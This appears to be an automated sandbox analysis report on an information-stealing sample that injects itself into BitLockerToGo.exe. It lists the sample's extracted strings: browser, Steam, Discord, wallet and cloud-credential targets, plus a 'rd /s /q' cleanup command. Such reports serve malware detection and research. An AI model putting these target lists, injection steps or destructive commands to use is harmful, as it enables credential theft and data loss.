                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                  Source: Google Drive.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: YouTube.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Sheets.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Gmail.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Slides.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Docs.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: N11R7lRasm.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: N11R7lRasm.exeStatic file information: File size 6520816 > 1048576
                  Source: N11R7lRasm.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2eea00
                  Source: N11R7lRasm.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x2c8800
                  Source: N11R7lRasm.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2comctl32gdi32:225121Windows 11HTTP/1.1HARDWARE\DESCRIPTION\System\CentralProcessor\0abcdefgh
                  Source: Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbA source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1852243141.000000000A8CE000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: vdr1.pdb source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1852243141.000000000A8CE000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: BitLockerToGo.pdb source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AADC000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cryptosetup.pdbGCTL source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp, f379r9.3.dr
                  Source: Binary string: cryptosetup.pdb source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp, f379r9.3.dr
                  Source: Binary string: BitLockerToGo.pdbGCTL source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AADC000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AB16000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1855724656.000000000AA40000.00000004.00001000.00020000.00000000.sdmp, N11R7lRasm.exe, 00000000.00000002.1852243141.000000000A8CE000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.2650192251.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_0040E886
                  Source: N11R7lRasm.exeStatic PE information: section name: .symtab
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\t0r90\f379r9Jump to dropped file
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\t0r90\f379r9Jump to dropped file
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\t0r90\f379r9Jump to dropped file

                  Boot Survival

                  barindex
                  Monitors registry run keys for changes
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_0040E886
                  Source: C:\Users\user\Desktop\N11R7lRasm.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\N11R7lRasm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\ProgramData\t0r90\f379r9Jump to dropped file
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_3-11565
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 4008Thread sleep count: 65 > 30
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00407891 FindFirstFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindNextFileA,FindClose,3_2_00407891
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040A69C FindFirstFileA,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,3_2_0040A69C
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00408776 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_00408776
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00413B10 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindNextFileA,FindNextFileA,FindClose,3_2_00413B10
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004013DA FindFirstFileA,FindNextFileA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindNextFileA,FindClose,3_2_004013DA
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00406784 ExpandEnvironmentStringsA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,3_2_00406784
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00411187 wsprintfA,FindFirstFileA,memset,memset,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,3_2_00411187
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00412A5D wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00412A5D
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00409C78 wsprintfA,FindFirstFileA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,3_2_00409C78
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00408224 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00408224
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00412539 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,3_2_00412539
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00411BD2 wsprintfA,FindFirstFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,3_2_00411BD2
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00411722 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,3_2_00411722
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040DF8C GetSystemInfo,wsprintfA,3_2_0040DF8C
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: Web Data.12.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: Web Data.12.drBinary or memory string: discord.comVMware20,11696494690f
                  Source: Web Data.12.drBinary or memory string: AMC password management pageVMware20,11696494690
                  Source: Web Data.12.drBinary or memory string: outlook.office.comVMware20,11696494690s
                  Source: Web Data.12.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: Web Data.12.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: Web Data.12.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: Web Data.12.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: Web Data.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: Web Data.12.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: Web Data.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: Web Data.12.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: msedge.exe, 0000000B.00000003.2097036344.00001FB40038C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                  Source: Web Data.12.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: Web Data.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: Web Data.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: Web Data.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: N11R7lRasm.exe, 00000000.00000002.1852003531.0000000001BDE000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000B.00000002.2157264139.0000027C20243000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Web Data.12.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: Web Data.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: Web Data.12.drBinary or memory string: tasks.office.comVMware20,11696494690o
                  Source: Web Data.12.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: Web Data.12.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: Web Data.12.drBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: Web Data.12.drBinary or memory string: global block list test formVMware20,11696494690
                  Source: Web Data.12.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: Web Data.12.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: Web Data.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: Web Data.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: Web Data.12.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: Web Data.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: Web Data.12.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: Web Data.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_3-12164
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_3-12258
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_3-11870
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_0040E886
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040DC15 GetProcessHeap,HeapAlloc,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,3_2_0040DC15

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Allocates memory in foreign processes
                  Source: C:\Users\user\Desktop\N11R7lRasm.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\N11R7lRasm.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5AJump to behavior
                  Searches for specific processes (likely to inject)
